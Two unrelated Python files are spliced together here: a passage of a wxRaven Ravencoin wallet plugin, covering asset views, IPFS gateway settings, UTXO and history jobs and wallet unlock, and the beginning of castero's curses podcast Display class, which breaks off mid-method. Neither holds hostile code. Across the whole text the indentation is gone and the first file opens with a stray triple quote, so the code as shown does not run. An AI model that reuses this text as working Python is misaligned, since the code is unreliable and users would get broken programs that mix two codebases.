from plugins.Ravencore.jobs.UTXOManager_WalletUTXOJob import Job_WalletUTXO
'''
try:
import pyperclip
except ImportError:
from libs import pyperclip
from datetime import datetime
import inspect
from .jobs import *
class wxRavenPlugin(PluginObject):
'''
classdocs
'''
def __init__(self, parentFrame, position="mgr"):
#Call the parent class with ParentFrame and Position
#This object is the plugin instance and will manage all views internally.
PluginObject.__init__(self, parentFrame, position=position)
#
#ParentFrame is used to refer to the main app
# Position is used to refer to the default position where views are opened.
#
# Define your plugin metadata:
#
# Name : name of the plugin; it must match the plugin folder name (not verified otherwise)
# Icon
# Views : all the views that the plugin contains
self.PLUGIN_NAME = "Ravencore"
self.PLUGIN_ICON = self.RessourcesProvider.GetImage('ravencoin') #wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
_iconOwnerlist = self.RessourcesProvider.GetImage('ownerlist')
#
# The view objects declare all the 'Views' that can be instantiated
# {
# 'viewid': a unique id for the view
# 'name': a name for the view
# 'title': a title id for the view
# 'position':,
# 'icon':
# 'class':
# 'default': Boolean to determine if the view is opened by default at startup
# 'multipleViewAllowed': Boolean to determine if the view allows multiple instances of itself
#}
#
self.PLUGINS_VIEWS= [
{
'viewid':'Asset Search',
'name':'Asset Search',
'title':'Asset Search',
'position':position,
'icon':self.RessourcesProvider.GetImage('search_ravencoin'),
'class': RavencoreAssetExplorer ,
'default':False,
'multipleViewAllowed':True
} ,
{
'viewid':'Asset Navigator',
'name':'Asset Navigator',
'title':'Asset Navigator',
'position':position,
'icon':self.RessourcesProvider.GetImage('asset_navigation'),
'class': RavencoreAssetNavigator ,
'default':False,
'multipleViewAllowed':True
} ,
{
'viewid':'Asset Issuer',
'name':'Asset Issuer',
'title':'Asset Issuer',
'position':position,
'icon':self.RessourcesProvider.GetImage('asset_new'),
'class': RavencoreAssetIssuerDialog ,
'default':False,
'multipleViewAllowed':False,
'skip_save': True,
},
{
'viewid':'Wallet',
'name':'Wallet',
'title':'Wallet',
'position':'main',
'icon':self.RessourcesProvider.GetImage('wallet'),
'class': wxRavenRavencore_UTXOManagerLogic ,
'default':False,
'multipleViewAllowed':True,
},
{
'viewid':'Transactions Viewer',
'name':'Transactions Viewer',
'title':'Transactions Viewer',
'position':'main',
'icon':self.RessourcesProvider.GetImage('inspect_file'),
'class': wxRavenP2PMarket_RavencoreTxViewerWithLogic ,
'default':False,
'multipleViewAllowed':True,
'skip_save': True,
},
{
'viewid':'Address Viewer',
'name':'Address Viewer',
'title':'Address Viewer',
'position':'main',
'icon':self.RessourcesProvider.GetImage('inspect_address'),
'class': wxRaven_Ravencore_AddressViewerLogic ,
'default':False,
'multipleViewAllowed':True,
},
{
'viewid':'Asset Owner Exporter',
'name':'Asset Owner Exporter',
'title':'Asset Owner Exporter',
'position':'dialog',
'icon':_iconOwnerlist,
'class': wxRaven_Ravencore_AssetOwnerExporterLogic ,
'default':False,
'multipleViewAllowed':False,
'skip_save': True,
'toolbar_shortcut': False,
'hidden_view': True,
},
]
"""
{
'viewid':"Network Infos",
'name':"Network Infos",
'title':"Network Infos",
'position':position,
'icon':self.RessourcesProvider.GetImage('connexion_speed_2'),
'class': wxRavenRavencore_NetInfosLogic ,
'default':False,
'multipleViewAllowed':False,
'toolbar_shortcut': False
},
,
{
'viewid':'Asset Issuer',
'name':'Asset Issuer',
'title':'Asset Issuer',
'position':position,
'icon':self.RessourcesProvider.GetImage('asset'),
'class': RavencoreAssetIssuerDialog ,
'default':False,
'multipleViewAllowed':False
}
"""
#
# The settings object declares all the 'default settings'.
# Once the plugin has been loaded for the first time, those settings are saved
# in a dedicated section of the config.ini file when the app closes.
#
# On the next plugin load, if the config file contains plugin settings,
# the defaults are overwritten in the _LoadPluginSettings() function.
#
# You need to declare your own function, as shown later in this file, to cast the data
# that comes back from the ConfigParser (strings only).
#
# {
# 'key': value
# }
#
self.PLUGIN_SETTINGS = {
'assetsearchlimit' : 50,
'strictname' : False,
'filtertype' : False,
'filtertypelist' : [],
'ipfsgateway_default' : 'https://wxraven.link/ipfs/',
'ipfsgateway_providers':['https://wxraven.link/ipfs/','https://wxraven.link/ipfs2/','https://ipfs.cryptide.ca/ipfs/','https://gateway.ravenclause.com/ipfs/', 'https://cloudflare-ipfs.com/ipfs/', 'https://ravencoinipfs-gateway.com/ipfs/'],
'bookmark_list':['My Assets'],
'navigation_use_cache' : True,
'tree_display_regroupby_main':False,
'tree_display_virtual_sort':False,
}
self.registerJob(Job_AddressInspectionAdvanced)
self.registerJob(Job_AddressInspection)
self.registerJob(Job_AddressUTXO)
self.registerJob(Job_AssetNavigator_AssetOwner)
self.registerJob(Job_AssetNavigator_Explore)
self.registerJob(Job_AssetNavigator_Search)
self.registerJob(Job_DecodeTx)
self.registerJob(Job_WalletHistory)
self.registerJob(Job_WalletUTXO)
#
# Let's add some settings panels from the pluginSettings file (to be defined as well)
#
"""
self.PLUGIN_SETTINGS_GUI = []
_prefIcon = self.RessourcesProvider.GetImage('wizard-prefs')
_MyTutorialSettingPanel_WithLogic = PluginSettingsTreeObject("Tutorial", _prefIcon, classPanel=MyTutorialSettingPanel_WithLogic, _childs=None)
self.PLUGIN_SETTINGS_GUI.append(_MyTutorialSettingPanel_WithLogic)
"""
self.PLUGIN_SETTINGS_GUI.clear()
_Icon = self.RessourcesProvider.GetImage('ravencoin')
_generalPannel = PluginSettingsTreeObject("Ravencore", _Icon, classPanel=wxRavencore_GeneralSettings_WithLogic, _childs=None)
_Icon = self.RessourcesProvider.GetImage('bookmarks_view')
_bmrkPannel = PluginSettingsTreeObject("Bookmarks", _Icon, classPanel=wxRavencore_BookmarksSettings_WithLogic, _childs=None)
_Icon = self.RessourcesProvider.GetImage('raven_ipfs')
_ipfsPannel = PluginSettingsTreeObject("IPFS Gateway", _Icon, classPanel=wxRavencore_IPFSSettings_WithLogic, _childs=None)
#wxRavencore_IPFSSettings_WithLogic
_generalPannel._childs.append(_ipfsPannel)
_generalPannel._childs.append(_bmrkPannel)
self.PLUGIN_SETTINGS_GUI.append(_generalPannel)
#self.PLUGIN_SETTINGS_GUI.append(_bmrkPannel)
#
# Data: to avoid each view individually requesting the same data through RPC,
# the plugin can hold global vars / data shared with the views.
# It also allows fetching that large data in a thread and triggering an update afterwards.
#
#self.setData("myPluginData", {})
#self.setData("myPluginData2", False)
self.setData("_LastSearch", "")
self.setData("_AssetSearchResult", {})
self.setData('_AssetOwnerList', {})
self.setData("_AssetLibraryList", {'My Assets':None})
self.setData("_CurrentLibrary", 'My Assets')
self.setData("_AllUTXOs", {'RVN':[], 'ASSETS':[]})
self.setData("_AllUTXOs_running", False)
self.setData("_tx_history", {})
self.setData("_tx_history_category", '')
self.setData("_tx_history_start", None)
self.setData("_tx_history_stop", None)
self.setData("_tx_history_address_filter", [])
self.setData("_utxo_manager_views_addons_callbacks", [])
self.setData("_last_tx_decoded", None)
self.setData("_address_viewer_running", False)
self.setData("_address_viewer_current_address_text", '')
self.setData("_address_viewer_advanced_mode", False)
self.setData("_address_viewer_check_inputs", False)
self.setData("_address_viewer_check_iterations", 1)
self.setData("_address_viewer_datas_utxo", {})
self.setData("_address_viewer_datas_tx_history", {})
#
# The plugin can register callbacks such as connection changes; in this case, it will start a thread to fetch data.
#
self.parentFrame.ConnexionManager.RegisterOnConnexionChanged(self.OnNetworkChanged_T)
#
# Finally, this last line is MANDATORY to load the default views.
#
#self.LoadPluginFrames()
"""
Plugin settings management.
Note: this method must be overridden in plugins that use settings, since
the config parser only returns STRING values.
"""
def _LoadPluginSettings(self):
_recordedSettings = self.parentFrame.Settings._GetPluginSettings(self.PLUGIN_NAME)
for key in _recordedSettings:
#
# _recordedSettings[key] returns strings only; do your own mapping for complex data structures
#
self.PLUGIN_SETTINGS[key] = _recordedSettings[key]
_str = _recordedSettings[key]
try:
convertedData = json.loads(_str.replace('\'','"'))
self.PLUGIN_SETTINGS[key] = convertedData
except Exception as e:
#print("NOT json data :" + str(e))
pass
if _str == "True":
self.PLUGIN_SETTINGS[key] = True
elif _str == "False":
self.PLUGIN_SETTINGS[key] = False
self.__create__libcache__()
def __create__libcache__(self):
_AssetLibraryList = {}
_bkmrk = self.PLUGIN_SETTINGS['bookmark_list']
for _bookmark in _bkmrk:
_AssetLibraryList[_bookmark] = None
self.setData("_AssetLibraryList", _AssetLibraryList)
'''
Plugin triggers / callbacks for data updates. DO NOT CALL WX UPDATES OUTSIDE OF wx.CallAfter(cb, param)
'''
def OnSearchRequested_T(self, keyword="", limit=50, onlyMain=False, callback=None, openViewAfter=False):
#t=threading.Thread(target=self.OnUpdatePluginDatas_SEARCH, args=(keyword,limit, onlyMain))
#t.start()
#Job_AssetNavigator_Explore
j = Job_AssetNavigator_Search(self, keyword=keyword,limit=limit,onlyMain=onlyMain, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
if openViewAfter:
_newView = self.parentFrame.Views.OpenView("Asset Search", "Ravencore", True)
print(_newView)
if _newView != None:
self.parentFrame.Views.OpenView("Asset Search", "Ravencore", False)
#_vi = self.parentFrame.Views.SearchViewInstance("Asset Search")
#_vi['instance'].Show()
#self.parentFrame.Views.
def OnNetworkChanged_T(self, networkName=""):
#t=threading.Thread(target=self.OnUpdatePluginDatas)
#t.start()
#wx.CallAfter(self.UpdateActiveViews, ())
#pass
if not self.parentFrame._isReady:
return None
#self.OnUTXORequested_T()
def OnUpdatePluginDatas_SEARCH(self, keyword="", limit=50, onlyMain=False):
print('OnUpdatePluginDatas_SEARCH === SHOULD BE REPLACED')
#self.setData("myPluginData", {})
#self.setData("myPluginData2", False)
'''
_AssetSearchResult = {}
#try:
try:
#if True:
keyword = keyword.upper()
_lastSearch = self.getData("_LastSearch")
if _lastSearch == keyword:
wx.CallAfter(self.UpdateActiveViews, ())
return
if keyword == "":
keyword = self.getData("_LastSearch")
_SkipChars = []
if onlyMain:
_SkipChars = ['#', "/", '$']
_AssetSearchResult = self.parentFrame.getRvnRPC().asset.SearchAsset(AssetName=keyword,limit=limit,datetime=True, skipChars=_SkipChars )
#myPluginData = self.parentFrame.ConnexionManager.getAllConnexions()
#myPluginData2 = self.parentFrame.ConnexionManager.getCurrent()
self.setData("_AssetSearchResult", _AssetSearchResult)
self.setData("_LastSearch", keyword)
#self.setData("myPluginData2", myPluginData2)
#When datas are loaded, add a call after to trigger plugins view update
wx.CallAfter(self.UpdateActiveViews, ())
except Exception as e:
self.RaisePluginLog( "Unable to search asset :"+ str(e), type="error")
'''
def OnNavigateRequested_T(self, lib="", callback=None):
self.setData("_CurrentLibrary", lib)
#t=threading.Thread(target=self.OnUpdatePluginDatas_NAVIGATE, args=(library,))
#t.start()
j = Job_AssetNavigator_Explore(self,library=lib, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
def OnUpdatePluginDatas_NAVIGATE(self, library=""):
print('OnUpdatePluginDatas_NAVIGATE === SHOULD BE REPLACED')
'''
if library == "":
library = "My Assets"
_resultData = None
_allLibs = self.getData("_AssetLibraryList")
navigation_use_cache = self.PLUGIN_SETTINGS['navigation_use_cache']
_virtualReorganizationButtonState = self.PLUGIN_SETTINGS['tree_display_virtual_sort']
_organizeByMainAssetButtonState = self.PLUGIN_SETTINGS['tree_display_regroupby_main']
if navigation_use_cache:
if _allLibs.__contains__(library):
if _allLibs[library] != None:
wx.CallAfter(self.UpdateActiveViews, ())
return
if library == "My Assets":
_resultData = self.parentFrame.getRvnRPC().asset.ExploreWalletAsset(OrganizeByMainAsset=_organizeByMainAssetButtonState)
_allLibs[library] = _resultData
else:
_resultData = self.parentFrame.getRvnRPC().asset.ExploreAsset(library, _limit=99999, _skipchars=[])
if _virtualReorganizationButtonState:
#print("EXPERIMENTAL = TRY TO REORGANIZE DATAS")
_resultData.Reorganize_Series(regularExp="^#[a-zA-Z0-9]+" , minOccurence=1)
#print(_resultData)
_allLibs[library] = _resultData
self.setData("_AssetLibraryList", _allLibs)
#self.setData("_CurrentLibrary", library)
wx.CallAfter(self.UpdateActiveViews, ())
#self.RaisePluginLog( "Unable to explore asset '"+keyword+"' :"+ str(e), type="error")
'''
def OnHISTORYRequested_T(self,callback=None):
self.setData("_tx_history", {})
#t=threading.Thread(target=self.OnUpdatePluginDatas_HISTORY, args=())
#t.start()
j = Job_WalletHistory(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
def OnUpdatePluginDatas_HISTORY(self, library=""):
print('OnUpdatePluginDatas_HISTORY === SHOULD BE REPLACED')
#print('OnUpdatePluginDatas_HISTORY')
'''
ravencoin = self.parentFrame.getRvnRPC()
_DatasHistory = { }
#if True:
#if True:
try:
_categorie = self.getData("_tx_history_category")
_start_date = self.getData("_tx_history_start")
_stop_date = self.getData("_tx_history_stop")
_filter_addresses = self.getData("_tx_history_address_filter")
_DatasHistory = ravencoin.wallet.GetWalletTransactionList(categorie=_categorie, filter_addresses=_filter_addresses, start_date=_start_date, stop_date=_stop_date)
#_ListAsset = ravencoin.asset.GetAssetUnspentList(assetname='', _fullDatas=True, _includeLocked=True)
#_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
wx.CallAfter(self.UpdateActiveViews, ())
except Exception as e:
self.RaisePluginLog( "Unable to update UTXO List : "+ str(e), type="error")
self.setData("_tx_history", _DatasHistory)
#print(f"SAVEDATA ")
'''
def OnUTXORequested_T(self, callback=None):
self.setData("_AllUTXOs", {'RVN':[], 'ASSETS':[]})
#t=threading.Thread(target=self.OnUpdatePluginDatas_UTXO, args=())
#t.start()
j = Job_WalletUTXO(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
def OnUpdatePluginDatas_UTXO(self, library=""):
pass
print('OnUpdatePluginDatas_UTXO === SHOULD BE REPLACED')
'''
if self.getData("_AllUTXOs_running")==True:
return
self.setData("_AllUTXOs_running", True)
print('OnUpdatePluginDatas_UTXO')
ravencoin = self.parentFrame.getRvnRPC()
_DatasUtxo = {'RVN':[],'ASSETS':[] }
#if True:
try:
_listRaw = ravencoin.wallet.GetUnspentList(_OnlySpendable=True, _ExlcudeAddresses=[],_IncludeOnlyAddresses=[], _fullDatas=True , _includeLocked=True)
_DatasUtxo = self.getData('_AllUTXOs')
_DatasUtxo['RVN'] = _listRaw
_ListAsset = ravencoin.asset.GetAssetUnspentList(assetname='', _fullDatas=True, _includeLocked=True)
_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
wx.CallAfter(self.UpdateActiveViews, ())
except Exception as e:
self.RaisePluginLog( "Unable to update UTXO List : "+ str(e), type="error")
self.setData("_AllUTXOs_running", False)
self.setData("_AllUTXOs", _DatasUtxo)
#print(f"SAVEDATA ")
'''
#
#
#AddressScan
#
#
def OnAddressScanRequest_T(self):
print(str(inspect.stack()[0][0].f_code.co_name))
print(str(inspect.stack()[1][0].f_code.co_name))
#print(str(inspect.stack()[2][0].f_code.co_name))
print('OnAddressScanRequest_T === SHOULD BE REPLACED')
#self.OnAddressUTXORequested_T()
#self.OnAddressHISTORYRequested_T()
def OnAddressUTXORequested_T(self, callback=None):
self.setData("_address_viewer_datas_utxo", {'RVN':[],'ASSETS':[] })
j = Job_AddressUTXO(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
#t=threading.Thread(target=self.OnUpdatePluginAddressDatas_UTXO, args=())
#t.start()
#
# Replaced by a JOB
#
def OnUpdatePluginAddressDatas_UTXO(self, library=""):
pass
print('OnUpdatePluginAddressDatas_UTXO === SHOULD BE REPLACED')
'''
_add = self.getData('_address_viewer_current_address_text')
print(f'OnUpdatePluginAddressDatas_UTXO {_add}')
ravencoin = self.parentFrame.getRvnRPC()
_DatasUtxo = {'RVN':[],'ASSETS':[] }
if True:
#try:
if _add == "":
return
_addressList = _add.split(',')
_listRaw = ravencoin.directories.GetAddressUnspentList( _addressList, asset="RVN", _excludeAsset='')
_DatasUtxo = self.getData('_address_viewer_datas_utxo')
_DatasUtxo['RVN'] = _listRaw
_ListAsset = ravencoin.directories.GetAddressUnspentList(_addressList, asset='*', _excludeAsset='RVN')
_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
wx.CallAfter(self.UpdateActiveViews, ())
#except Exception as e:
# self.RaisePluginLog( "Unable to update address UTXO List : "+ str(e), type="error")
self.setData("_address_viewer_datas_utxo", _DatasUtxo)
'''
def OnAddressHISTORYRequested_T(self, callback=None):
self.setData("_address_viewer_datas_tx_history", {})
j = Job_AddressInspection(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
#self.setData("_address_viewer_datas_tx_history", {})
#t=threading.Thread(target=self.OnUpdatePluginAddressDatas_HISTORY, args=())
#t.start()
#
# Replaced by a JOB
#
def OnUpdatePluginAddressDatas_HISTORY(self, library=""):
pass
print('OnUpdatePluginAddressDatas_HISTORY === SHOULD BE REPLACED')
'''
if self.getData("_address_viewer_running") ==True:
return
print('OnUpdatePluginDatas_HISTORY')
_add = self.getData('_address_viewer_current_address_text')
ravencoin = self.parentFrame.getRvnRPC()
_DatasHistory = []
self.setData("_address_viewer_running", True)
#if True:
if True:
#try:
if _add == "":
return
_addressList = _add.split(',')
#_categorie = self.getData("_tx_history_category")
#_start_date = self.getData("_tx_history_start")
#_stop_date = self.getData("_tx_history_stop")
#_filter_addresses = self.getData("_tx_history_address_filter")
_DatasHistoryList = ravencoin.directories.GetAddressTransactionList(_addressList, _fullScan=False)
_cursor = 0
_max = len(_DatasHistoryList)
for _item in _DatasHistoryList:
#print(f"Inspecting Transactions ({_cursor} / {_max}0")
_txInspected = ravencoin.utils.GetAndScanRawTransaction(_item, _addressList)
_DatasHistory.append(_txInspected)
_cursor = _cursor+1
#print(_DatasHistory)
#_ListAsset = ravencoin.asset.GetAssetUnspentList(assetname='', _fullDatas=True, _includeLocked=True)
#_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
#wx.CallAfter(self.UpdateActiveViews, ())
#except Exception as e:
# self.RaisePluginLog( "Unable to update address transaction history List : "+ str(e), type="error")
self.setData("_address_viewer_running", False)
self.setData("_address_viewer_datas_tx_history", _DatasHistory)
'''
#
# Views caller and quickwin
#
def AddAssetInBookmark(self, assetName):
currentBk = self.PLUGIN_SETTINGS['bookmark_list']
if not currentBk.__contains__(assetName):
currentBk.append(assetName)
_allLibs = self.getData("_AssetLibraryList")
_allLibs[assetName] = None
self.setData("_AssetLibraryList", _allLibs)
self.PLUGIN_SETTINGS['bookmark_list'] = currentBk
wx.CallAfter(self.UpdateActiveViews, ())
def NaviguateAsset(self, assetName):
print("Plugin navigation requested:"+str(assetName))
self.OnNavigateRequested_T(assetName)
vcount = 0
_views = []
_navViewDatas = {}
for r in self.VIEWS_INSTANCES:
rView = r['instance']
vName = r['viewid']
if vName == "Asset Navigator":
rView.ShowLoading()
vcount = vcount+1
_views.append(rView)
if vcount ==0:
_newView = self.LoadView(self.SearchPluginView("Asset Navigator"), "main")
_newView.ShowLoading()
#_allLibs = self.getData("_AssetLibraryList")
def previewIPFS(self, ItemURL, openNew=False):
#wx.Log.SetActiveTarget(wx.LogStderr())
_PreviewWindow = self.getData("_PreviewWindow")
if _PreviewWindow == None or openNew:
_PreviewWindow = RavencoreHTMLViewer(self.parentFrame, ItemURL, 'mgr')
self.setData("_PreviewWindow", _PreviewWindow)
else:
_PreviewWindow.wv.LoadURL(ItemURL)
self.parentFrame.Views.ShowParentInManager(_PreviewWindow)
#self.parent_frame.Views.OpenView("Simple Wallet", pluginname='', createIfNull=True)
#self.parent_frame.m_mgr.GetPane("Asset Preview").Show()
#self.parent_frame.Views.UpdateGUIManager()
def OpeninWebBrowser(self, _url):
webbrowser.open(_url)
def OpenIPFSinWebBrowser(self, _data, provider=""):
print(_data)
_ipfsgateway_default = self.parentFrame.GetPluginSetting("Ravencore","ipfsgateway_default")
_gateway = provider
if provider == "":
_gateway = _ipfsgateway_default
#_data= self._datacache[self._currentItem]
print(_data['has_ipfs'])
if _data['has_ipfs']:
_url = _gateway +_data['ipfs_hash']
self.OpeninWebBrowser(_url)
def CopyClip(self, _data):
#itemData = self._datacache[self._currentItem]
print(_data)
if _data['has_ipfs']:
pyperclip.copy(_data['ipfs_hash'])
#self.infoMessage("IPFS Hash copied to the clipboard", wx.ICON_INFORMATION)
def OpenAssetIssuer(self, rootAsset=""):
_newView = self.LoadView(self.SearchPluginView("Asset Issuer"), "main")
if rootAsset !="":
print(">root setup requested")
_newView.setupRoot(rootAsset)
#_popupDialog = RavencoreAssetIssuerDialog(self.parentFrame)
def ExportAssetOwnerList(self, assetSearch):
_newView = self.parentFrame.Views.OpenView("Asset Owner Exporter", "Ravencore", True)
#if txdatas !="":
if True:
_v=self.parentFrame.Views.SearchDialog("Asset Owner Exporter")
if _v!=None:
print(f">ExportAssetOwnerList requested {assetSearch}")
_v._Panel.SetAssetAndStart(assetSearch)
def ShowTxInfos(self, txdatas="", openIfnotExist=True):
#_newView = self.parentFrame.Views.OpenView("Transactions Viewer", "Ravencore", openIfnotExist)
_newView = self.LoadView(self.SearchPluginView("Transactions Viewer"), "main")
if txdatas!="":
_newView.SetTxId(txdatas)
def GetUTXOManager(self, open=True):
_newView = self.parentFrame.Views.OpenView("Wallet", "Ravencore", open)
print(_newView)
if _newView == None:
_vi = self.parentFrame.Views.SearchViewInstance("Wallet")
return _vi['instance']
return _newView['instance']
def CheckIPFSGateway(self):
pass
def QuickWalletUnlockRequest(self):
ravencoin = self.parentFrame.getRvnRPC()
pwd=RequestUserWalletPassword(self.parentFrame)
if pwd != None:
res=ravencoin.wallet.__check_unlock__(_passphrase=pwd, timeout=30)
#UserAdvancedMessage(parentf, message, type, msgdetails, showCancel)
ReportRPCResult(self.parentFrame, res )
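# --- Illustrative sketch (added for clarity; not part of the original plugin) ---
# _LoadPluginSettings() above casts the string values handed back by the ConfigParser:
# JSON-looking values (lists, dicts, numbers) are decoded, and "True"/"False" become
# booleans. The helper below mirrors that logic in isolation; the sample values are made up.
def _example_cast_recorded_setting(raw_value):
    import json
    value = raw_value
    try:
        # settings are stored with single quotes, so normalise them before decoding
        value = json.loads(raw_value.replace("'", '"'))
    except Exception:
        pass
    if raw_value == "True":
        value = True
    elif raw_value == "False":
        value = False
    return value
# e.g. _example_cast_recorded_setting("['My Assets']") -> ['My Assets']
#      _example_cast_recorded_setting("False")         -> False
#      _example_cast_recorded_setting("50")            -> 50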
|
display.py
|
import curses
import glob
import importlib
import threading
from typing import List
from os.path import dirname, basename, isfile
import castero
from castero import helpers
from castero.config import Config
from castero.database import Database
from castero.downloadqueue import DownloadQueue
from castero.feed import Feed, FeedError, FeedLoadError, FeedDownloadError, \
FeedParseError, FeedStructureError
from castero.episode import Episode
from castero.perspective import Perspective
from castero.queue import Queue
class DisplayError(Exception):
"""An ambiguous error while handling the display.
"""
class DisplaySizeError(DisplayError):
"""The display does not have acceptable dimensions.
"""
class Display:
"""The Display class.
This class is used to handle all user-interaction. It creates and handles
all aspects of the application's interface, including windows and menus. It
retrieves input from the user and performs corresponding actions.
"""
MIN_WIDTH = 20
MIN_HEIGHT = 8
INPUT_TIMEOUT = 1000  # 1 second (curses timeout is given in milliseconds)
STATUS_TIMEOUT = 4 # multiple of INPUT_TIMEOUT
AVAILABLE_COLORS = {
'black': curses.COLOR_BLACK,
'blue': curses.COLOR_BLUE,
'cyan': curses.COLOR_CYAN,
'green': curses.COLOR_GREEN,
'magenta': curses.COLOR_MAGENTA,
'red': curses.COLOR_RED,
'white': curses.COLOR_WHITE,
'yellow': curses.COLOR_YELLOW,
'transparent': -1
}
KEY_MAPPING = {chr(i): i for i in range(256)}
KEY_MAPPING.update(
(name[4:], value) for name, value in vars(curses).items()
if name.startswith('KEY_')
)
KEY_MAPPING.update(
{
'ENTER': 10,
'SPACE': 32
}
)
AVAILABLE_PLAYERS = {}
def __init__(self, stdscr, database) -> None:
"""Initializes the object.
Args:
stdscr: a stdscr from curses.initscr()
database: a connected castero.Database
"""
self._stdscr = stdscr
self._database = database
self._parent_x = -1
self._parent_y = -1
self._perspectives = {}
self._active_perspective = 1
self._header_window = None
self._footer_window = None
self._queue = Queue(self)
self._download_queue = DownloadQueue(self)
self._status = ""
self._status_timer = self.STATUS_TIMEOUT
self._menus_valid = True
self._modified_episodes = []
# basic preliminary operations
self._stdscr.timeout(self.INPUT_TIMEOUT)
curses.start_color()
curses.noecho()
curses.curs_set(0)
curses.cbreak()
self._stdscr.keypad(True)
self.update_parent_dimensions()
self.create_color_pairs()
self._load_perspectives()
self._load_players()
self._create_windows()
self.create_menus()
def create_color_pairs(self) -> None:
"""Initializes color pairs used for the display.
Creates the following color pairs (foreground, background):
- 1: foreground, background
- 2: background, foreground
- 3: background_alt, foreground_alt
- 4: foreground_alt, background_alt
"""
assert Config["color_foreground"] in self.AVAILABLE_COLORS
assert Config["color_background"] in self.AVAILABLE_COLORS
assert Config["color_foreground_alt"] in self.AVAILABLE_COLORS
assert Config["color_background_alt"] in self.AVAILABLE_COLORS
if (self.AVAILABLE_COLORS[Config["color_background"]] == -1 or
self.AVAILABLE_COLORS[Config["color_background_alt"]] == -1):
curses.use_default_colors()
curses.init_pair(
1,
self.AVAILABLE_COLORS[Config["color_foreground"]],
self.AVAILABLE_COLORS[Config["color_background"]]
)
curses.init_pair(
2,
self.AVAILABLE_COLORS[Config["color_background"]],
self.AVAILABLE_COLORS[Config["color_foreground"]]
)
curses.init_pair(
3,
self.AVAILABLE_COLORS[Config["color_background_alt"]],
self.AVAILABLE_COLORS[Config["color_foreground_alt"]]
)
curses.init_pair(
4,
self.AVAILABLE_COLORS[Config["color_foreground_alt"]],
self.AVAILABLE_COLORS[Config["color_background_alt"]]
)
curses.init_pair(
5,
self.AVAILABLE_COLORS[Config["color_foreground_dim"]],
self.AVAILABLE_COLORS[Config["color_background"]]
)
def _load_perspectives(self) -> None:
"""Load instances of perspectives from the `perspectives` package.
"""
# load a list of modules names by manually detecting .py files
module_files = glob.glob(dirname(__file__) + "/perspectives/*.py")
module_names = [basename(f)[:-3] for f in module_files if isfile(f)]
for name in module_names:
p_mod = importlib.import_module("castero.perspectives.%s" % name)
p_cls = getattr(
p_mod,
dir(p_mod)[[cls.lower() == name
for cls in dir(p_mod)].index(True)])
inst = p_cls(self)
self._perspectives[inst.ID] = inst
def _load_players(self) -> None:
"""Load player classes from the `players` package.
"""
# load a list of modules names by manually detecting .py files
module_files = glob.glob(dirname(__file__) + "/players/*.py")
module_names = [basename(f)[:-3] for f in module_files if isfile(f)]
for name in module_names:
p_mod = importlib.import_module("castero.players.%s" % name)
p_cls = getattr(
p_mod,
dir(p_mod)[[cls.lower() == name
for cls in dir(p_mod)].index(True)])
self.AVAILABLE_PLAYERS[p_cls.NAME] = p_cls
def _create_windows(self) -> None:
"""Creates and sets basic parameters for the windows.
If the windows already exist when this method is run, this method will
delete them and create new ones.
"""
# delete old windows if they exist
if self._header_window is not None:
del self._header_window
self._header_window = None
if self._footer_window is not None:
del self._footer_window
self._footer_window = None
# create windows
self._header_window = curses.newwin(2, self._parent_x,
0, 0)
self._footer_window = curses.newwin(2, self._parent_x,
self._parent_y - 2, 0)
# set window attributes
self._header_window.attron(curses.color_pair(4))
self._footer_window.attron(curses.color_pair(4))
# create windows for all perspectives
for perspective_id in self._perspectives:
self._perspectives[perspective_id].create_windows()
def create_menus(self) -> None:
"""Creates the menus used in each window.
Windows which have menus should be created prior to running this method
(using _create_windows).
"""
for perspective_id in self._perspectives:
self._perspectives[perspective_id].create_menus()
def show_help(self) -> None:
"""Show the help screen.
This method takes over the main loop, displaying the screen until a key
is pressed. This means that typical loop actions, including checking
the state of the current player, will not run while this screen is up.
"""
self.clear()
self._stdscr.refresh()
padding_yx = (1, 4)
help_window = curses.newwin(self._parent_y, self._parent_x, 0, 0)
help_window.attron(curses.A_BOLD)
# display lines from __help__
help_lines = \
castero.__help__.split('\n')[:self._parent_y - padding_yx[0] - 1]
help_lines.append("Press any key to exit this screen.")
for i in range(len(help_lines)):
help_window.addstr(i + padding_yx[0], padding_yx[1],
help_lines[i][:self._parent_x - padding_yx[1]])
help_window.refresh()
# simply wait until any key is pressed (temporarily disable timeout)
self._stdscr.timeout(-1)
self._stdscr.getch()
self._stdscr.timeout(self.INPUT_TIMEOUT)
self.clear()
def display(self) -> None:
"""Draws all windows and sub-features, including titles and borders.
"""
# check if the screen size has changed
self.update_parent_dimensions()
# check to see if menu contents have been invalidated
if not self.menus_valid:
for perspective_id in self._perspectives:
self._perspectives[perspective_id].update_menus()
self.menus_valid = True
# add header
playing_str = castero.__title__
if self._queue.first is not None:
state = self._queue.first.state
playing_str = ["Stopped", "Playing", "Paused"][state] + \
": %s" % self._queue.first.title
if self._queue.length > 1:
playing_str += " (+%d in queue)" % (self._queue.length - 1)
if helpers.is_true(Config["right_align_time"]):
playing_str += ("[%s]" % self._queue.first.time_str).rjust(
self._header_window.getmaxyx()[1] - len(playing_str))
else:
playing_str += " [%s]" % self._queue.first.time_str
self._header_window.attron(curses.A_BOLD)
self._header_window.addstr(0, 0, " " * self._parent_x)
self._header_window.addstr(0, 0, playing_str)
# add footer
footer_str = ""
if self._status == "" and not \
helpers.is_true(Config["disable_default_status"]):
feeds = self.database.feeds()
if len(feeds) > 0:
total_feeds = len(feeds)
lengths_of_feeds = \
[len(self.database.episodes(feed)) for feed in feeds]
total_episodes = sum(lengths_of_feeds)
median_episodes = helpers.median(lengths_of_feeds)
footer_str += "Found %d feeds with %d total episodes (avg." \
" %d episodes, med. %d)" % (
total_feeds,
total_episodes,
total_episodes / total_feeds,
median_episodes
)
else:
footer_str += "No feeds added"
else:
footer_str = self._status
